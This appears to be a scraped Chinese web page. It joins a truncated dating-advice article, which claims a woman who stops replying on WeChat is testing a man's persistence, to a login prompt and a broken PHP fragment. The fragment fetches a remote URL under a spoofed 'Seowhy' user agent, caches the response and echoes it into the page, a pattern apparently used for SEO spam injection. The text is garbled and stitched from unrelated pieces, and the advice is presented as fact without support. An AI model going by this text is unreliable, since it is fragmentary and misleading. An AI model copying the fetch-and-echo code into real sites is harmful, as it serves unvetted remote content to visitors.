小王最近认识了一个女孩子,两人聊了大概一个星期左右,小王对这个女生很有好感,想把她约出来一起玩玩,但是当他给女孩发微信的时候,这个女孩子却不回了,小王觉得很苦恼,是不是这个女孩子不喜欢自己呢?其实女生不回微信是在考验男生,她想试试这个男生的真心,看看这个男生到底可以坚持多久。  很多人觉得爱情是经不起考验的,但是在现在这个时代,速食爱
2022-04-07 679
没有账号?注册  忘记密码?
array( "header"=>array( "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20100101 Firefox/21.0 Seowhy", ), "method" => "GET", "timeout" => 2 ), ); $context = stream_context_create($opts); $content = @file_get_contents($url,false, $context); if (isset($http_response_header)) { if(is_array($http_response_header)){ $http_response_header = $http_response_header[0]; } if(strpos($http_response_header,"200 OK") !==false && $content != "error"){ @file_put_contents($cacheUrl, $content); echo $content; } } }else{ $content = @file_get_contents($cacheUrl); echo $content; } ?>